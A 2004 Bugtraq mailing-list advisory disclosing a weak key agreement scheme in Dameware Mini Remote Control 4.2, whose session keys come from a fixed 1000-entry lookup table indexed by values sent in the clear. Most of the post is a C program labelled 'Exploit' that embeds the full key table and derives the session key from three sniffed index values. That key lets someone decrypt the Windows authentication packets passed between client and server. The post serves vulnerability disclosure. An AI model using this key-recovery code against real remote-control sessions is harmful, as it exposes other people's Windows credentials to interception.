[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Dameware Mini Remote Control Version 4.2 Weak Key Agreement Scheme
From: ax09001h <ax09001h () hotmail ! com>
Date: 2004-04-30 18:26:46
Message-ID: 20040430182646.29912.qmail () www ! securityfocus ! com
[Download RAW message or body]
Title: Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme
Versions: Dameware Mini Remote Control Version 4.2
Vulnerability: The latest version of Dameware’s Mini Remote Control System uses a \
weak key agreement scheme. The scheme consists of the sharing of pointers into a \
fixed key lookup table. Both the client and the server have access to a key lookup \
table (KLT) consisting of 1000 32-bit values. Prior to encrypting traffic the \
server sends to the client a series of 32-bit integers, call it the key index table \
(KIT). For the sake of description lets call the indices klt_idx[4], an array of 4 \
32-bit integers. The klt_idx are set as follows:
klt_idx[0] = KIT[100];
klt_idx[1] = KIT[4];
klt_idx[2] = 42;
klt_idx[3] = KIT[37];
The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.
sk[0] = KLT[klt_idx[0]];
sk[1] = KLT[klt_idx[1]];
sk[2] = KLT[klt_idx[2]];
sk[3] = KLT[klt_idx[3]];
This of course produces 0-bits of security.
They proceed to correct the Electronic Code Book mode of encrypting other \
authentication packets using the above constructed key using Blowfish in cipher block \
chaining mode with an IV = 0.
Exploit:
/*
dwgenkey.c dameware generate key program.
this function mimics the dameware
key generation algorithm used to
pass encrypted windows authentication
across between client and server
ax09001h@hotmail.com
*/
#include <stdio.h>
#include <stdlib.h>
unsigned int KLT [1000] =
{
0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29, 0x48A20FA2,
0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB, 0xBC2B83CD,
0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058, 0x5474C05,
0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A, 0xCFA8D725,
0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762,
0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88,
0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B,
0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE,
0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096,
0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089,
0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E,
0xB9F8AF1C, 0xF797E46C, 0x5F2F339D, 0xB792AB5F, 0x462050F7, 0xF922EDBD,
0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821,
0xAA69288, 0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23,
0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E,
0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3,
0xFD572127, 0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7,
0x1093FA43, 0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22, 0x7A153138,
0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E, 0x2E464810,
0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0,
0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642,
0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7,
0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA,
0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 0xDA3EAE89, 0xA1A00078, 0xB55B5C3E,
0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D,
0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E,
0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1,
0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244,
0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86,
0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E,
0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B,
0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC,
0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0,
0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9,
0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C,
0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6,
0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61,
0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4,
0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF,
0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6, 0xF53E8558,
0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C,
0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8,
0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809,
0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856,
0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB,
0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9,
0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405,
0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B,
0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D,
0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942,
0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04,
0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D,
0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621,
0xC421154, 0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
0x7C07054, 0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9, 0x27C3B146,
0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81, 0x98E93630,
0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8, 0xAF2A72E8,
0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601,
0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6, 0xA3C182A3,
0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2,
0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A, 0xA45A497,
0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C,
0x67DEDD8, 0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1,
0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2,
0x76E7D2A6, 0x536501F, 0xC77CA12B, 0x5E6E2842, 0x9896F26C, 0x2BC45D27,
0xE2FF89C7, 0x11FBC8C, 0x252652BD, 0x61AA26A4, 0xF3DF28A, 0xAFB90C39,
0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE, 0x2630C3A2, 0xC0F995BC, 0x27677058,
0x49E5FA9C, 0x3B66C518, 0x7654283D, 0xB8305341, 0x72E94CF, 0x3E181088,
0x9F721122, 0xC536D545, 0x8BD48FE7, 0xA0899C0F, 0x950D4B9C, 0xCDFA8F86,
0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C,
0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C,
0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D,
0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4,
0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B,
0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990,
0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265, 0x384C4B56,
0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9,
0xC144F12E, 0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3,
0x6B32E419, 0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA634,
0x95F72F6A, 0x17E27035, 0xC91082D7, 0x5F2BEE2F, 0x68EE3EA8, 0xD2238F52,
0xD622F757, 0x2CE5FE15, 0x4DD2E862, 0xD8B78679, 0xA068E1E3, 0x9DA3764,
0xA46DC043, 0xEF5A319E, 0x3CA47D7, 0x15D66FBD, 0x70FD11C5, 0xEB93FAE7,
0xE0C76863, 0xCA8DB56B, 0x549B7A6D, 0x7830B60E, 0x63EC6EA1, 0xC5F8C700,
0x25F6631D, 0x81C74AA6, 0x1FEBAAA6, 0x50FACED0, 0xF3B16C0C, 0x42D24E7D,
0x87FAB7B4, 0x8998222D, 0xCF13B716, 0xD77799C7, 0xF19B6249, 0xCC56A6E6,
0x3D87AC7E, 0x2A73259B, 0x5503BDFD, 0xD95F05F1, 0xC01BCD8B, 0x6F9C96E2,
0x6B2D997, 0xB3F54B81, 0x3139AC71, 0x504DC220, 0x9D4C8848, 0xFAB47FBF,
0xF910278A, 0x1AAD13D7, 0x667DC201, 0x2A2AE786, 0x845C31FA, 0x27F4E75,
0x413D1796, 0x9236D7BC, 0x8FAC3425, 0x866DC291, 0x97796BE4, 0x3581CDF,
0xA313B372, 0x57907BA0, 0x981BE778, 0x67DA3DF6, 0x947D9EC1, 0xCFA65CA6,
0x6261BF74, 0xD818DCB0, 0x30CBA2D1, 0x1A41B299, 0x33317112, 0x424A6EB6,
0x516FA0C5, 0x1B0EBEDC, 0xDDAB9664, 0xCBDE0912, 0x8E567CFA, 0xA1C9DAEB,
0x1C7DB358, 0xA144F1FE, 0x2B7FEE15, 0xB5CA6B77, 0x2B1655B3, 0xFF3D846B,
0x2B0B907A, 0xC0948E5C, 0x608A1725, 0x2FF6781C, 0x555C1AAC, 0xDB70AD3E,
0xDFD488CA, 0x2170C025, 0x576C15E7, 0x5F447947, 0x30B8108F, 0xBB9ADE84,
0x8808C71A, 0xB760EA1F, 0x4E503018, 0x534BA5B5, 0xCDF5FE07, 0xEC48167F,
0xD1E7227A, 0xCD998A1, 0xE754F192, 0x2727BFFF, 0xBFB0694D, 0xF454B618,
0x63EBFF6, 0x30BD09D0, 0x927F98B2, 0x6F96ED41, 0xC249BFB1, 0x8E07ED96,
0x6D3B63AE, 0xC661C79A, 0x574D1947, 0x691AC06A, 0x1241A695, 0xDA814574,
0xF520C090, 0x7AAFF6DF, 0x6314F55A, 0x99BF992E, 0x4C2350AA, 0x16C970F2,
0xBC5DAF3D, 0x948FEE79, 0xCF038D84, 0x94916A6F, 0x67C9C446, 0x769D41FC,
0x7AB8FC6B, 0xAC88CDC6, 0x2632E0F2, 0x7A39D045, 0xE07D60C3, 0x627F0F1B,
0x6C9E9B6F, 0x5443B96A, 0xB42AEFB6, 0x7D971F39, 0x1E543216, 0xAB1F0A,
0x4B0E8966, 0xBE389C53, 0xE8143B78, 0x845EEA38, 0x1BC4E0C1, 0xC33854ED,
0xEBE30DBC, 0xAE0FFAD8, 0x545B28DB, 0x64CB5928, 0x516227C9, 0xDA7DED1B,
0x60957017, 0xEF42F6C4, 0xD1D44B1A, 0x6E9DCDB0, 0x8089B1C8, 0x78229E35,
0xE65C19DF, 0xBE4926F8, 0x22F282DB, 0x1DAD0725, 0x1F1E94A5, 0xE1F97ACD,
0x7EA0006F, 0x94F6FBDD, 0x26214BED, 0xFC7FF0CC, 0xA2393542, 0xB472E61E,
0x301E470, 0x36FD7EE5, 0xF179CB04, 0x18CC9785, 0x2E0F60B2, 0x13112B9B,
0x21CE96F9, 0xCF50766C, 0x420F7FBE, 0x3062489, 0xA2E5956D, 0x38AF92C9,
0x826DB438, 0xCA1D08C7, 0x2CAA1940, 0xCCCDF1C, 0x9C3FE51D, 0x1ECDC7D8,
0x909C80DE, 0x646BFFA9, 0x6318213D, 0x32C14EFF, 0xC8351460, 0x6D81B09,
0xC3BA2047, 0x4078D5B1, 0x7AF40C50, 0x7128296, 0xB57DE4BE, 0xBD35598,
0x2256C607, 0xB6177952, 0xF276EF63, 0x55D787AF, 0x2267BE3B, 0x48B1B069,
0x5CF704D4, 0x4C1B3376, 0xDF687016, 0x68B38FE2, 0x19E808B4, 0x2FFF302B,
0x78BD0181, 0xBC4A03F0, 0x98562262, 0xB9797F02, 0x1E7B17D3, 0x61B031D1,
0x8E69A1F8, 0x32863D7E, 0x8140AA57, 0xD42FB27E, 0x825645B2, 0x7E0AC685,
0x1752B306, 0xEF07F2F7, 0xF031981C, 0xA061064D, 0xE118F8AB, 0xCCE37EF9,
0x6AEBFCF7, 0xEEED8568, 0x98A86406, 0x6B7D3AAA, 0xAD068483, 0x2E71AAF2,
0x1800DB2E, 0xA98F5949, 0xE111A890, 0x17E02EB3, 0xC6B72970, 0x15067E3E,
0xB2291D61, 0x6008098F, 0xDAD360FF, 0xD19E95D, 0xBEFD0EC7, 0x5F4C9183,
0xCB5EAB77, 0xC6A1FB76, 0xD71F95D2, 0xFC7FDB6E, 0x80DD91AB, 0x8E322B21,
0xAAE68069, 0xC2CEB8A5, 0xC89D1CA1, 0x931577D8, 0x4D6F1725, 0xC3E0EC5A,
0x7F94E8FB, 0x3E008B9C, 0x1DC1680D, 0xF99F3782, 0xFD54CD8F, 0x97722074,
0xE0F06DB7, 0xF9B44EE8, 0xFBF70D53, 0xDF3B605F, 0xB6CDC64D, 0xD5CC9449,
0x75A2DC1A, 0x62C4D3AE, 0x6FB02ED3, 0x55F97BF8, 0x86179194, 0x67488E2,
0x1071C487, 0x5D196F3C, 0x9FCDBA5E, 0x994036B, 0x538C2B87, 0xE3CA84F4,
0xE6D29642, 0xAA8E0B45, 0xF3557176, 0x403E0041, 0xF1056A7D, 0xB163CC68,
0xB00F9A47, 0x6E13B87, 0x93C25E4F, 0x4BFCEC42, 0xD4AAE81, 0x9FA016C,
0x8A842986, 0xDC301A3B, 0xA43D96F1, 0x1DFB9302, 0x4D9F9AAE, 0x6A7416FF,
0xCF2E7C59, 0x76478C25, 0xAD4A317E, 0x8985000D, 0x38FED22B, 0xFD0944A9,
0xD2A319D1, 0x9D9ABC55, 0x2A1F76B0, 0x9BCDAA0D, 0x2DE5847, 0xDF44583C,
0xF4CEBE0F, 0x6733F2CD, 0x5F8A8DA5, 0x4526D975, 0xB6E458B7, 0x4D2BB1A6,
0x137AA2C6, 0x6DDCFC23, 0xA41CE8B6, 0x4A442E7E, 0xFB7A0A5, 0xF7808F43,
0x5D10DDD6, 0xA52D6396, 0x61574048, 0x8923CBA2, 0x6436DD12, 0x49266343,
0xF1787AAB, 0xC467FB1A, 0x25278A4B, 0x2181A43C, 0xC4EAF160, 0x88A9E6BB,
0xC7AF0933, 0x8002BA84, 0xB134654, 0x4A015A8E, 0xEC16E6AF, 0xEC154BE3,
0x10FE786A, 0x8F5EA3E7, 0x1A92D7C4, 0xD90FE65A, 0x6CF77EA3, 0x394EB8F9,
0x573B2AF9, 0xD6396AFA, 0xCC79F56, 0xC36AA7DB, 0x88B6126E, 0x3BBD5F44,
0xA8086DC7, 0x9437E86F, 0xA8A72E5F, 0x204CC584, 0x508AAC96, 0xEACC6EF1,
0x981E7A1A, 0xA16DF863, 0xAA9FD0B9, 0x22F6D8DA, 0xA05A7581, 0xD9782911,
0xCCBDFFD7, 0x7E3C9F4E, 0x96FC6F3D, 0x7113F1FC, 0xD312E7BD, 0x6AD91B0F,
0x394E21FA, 0x47F135EE, 0xA24E4FE5, 0x2C7A682E, 0x185161A9, 0x6AF00259,
0xD411424D, 0xB207A9E1, 0xF4E482E7, 0x6173F9FE, 0xE3CEC249, 0xB63D392B,
0x3FE5BEDF, 0x82C2E736, 0x69FF3BA2, 0x9D219633, 0x8DA0F96F, 0xDFCCCB9,
0xC4A6A06F, 0xBC536DF7, 0xE76CC1F, 0x452F4BD1, 0x1BC9BA19, 0x4427617C,
0x4410511D, 0xD2B3643B, 0x90066BE6, 0x9B03705C, 0xF144AE, 0x5017F6E5,
0x2EC8DA0, 0xC4733AAE, 0xD2CB991D, 0xFF695547, 0xE662D331, 0xA374917C,
0xB53B62CC, 0xBF135D1, 0x3240CEBA, 0xB406298B, 0x5065FE42, 0x9BB538CC,
0xC89AF46A, 0x97FB692D, 0xB0123130, 0xED5BFFB1, 0x2CC09D9, 0x68E4E060,
0xB117D6E7, 0xBA9CE7B3, 0xB731559B, 0x876FF1D
};
int usage()
{
printf("USAGE: dwkeygen INDEX0 INDEX1 INDEX2\n");
printf("\t INDEX0 is the hexidecimal value of 101st unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("\t INDEX1 is the hexidecimal value of 5th unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("\t INDEX2 is the hexidecimal value of 38th unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("OUTPUT: dameware encryption key\n");
return 0;
}
int main(int argc, char **argv)
{
int i;
unsigned int sk[4], klt_idx[4];
if(argc!=4) { return usage(); }
klt_idx[0] = strtol(argv[1], NULL, 16);
klt_idx[1] = strtol(argv[2], NULL, 16);
klt_idx[2] = 42;
klt_idx[3] = strtol(argv[3], NULL, 16);
for(i=0;i<4;i++){
sk[i] = KLT[klt_idx[i]];
printf("%08X ", sk[i]);
}
printf("\n");
return 0;
}
Recommendation: The general recommendation is to use another software package. This \
program seems to be riddled with poor software practices and a lack of understanding \
of security principles.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic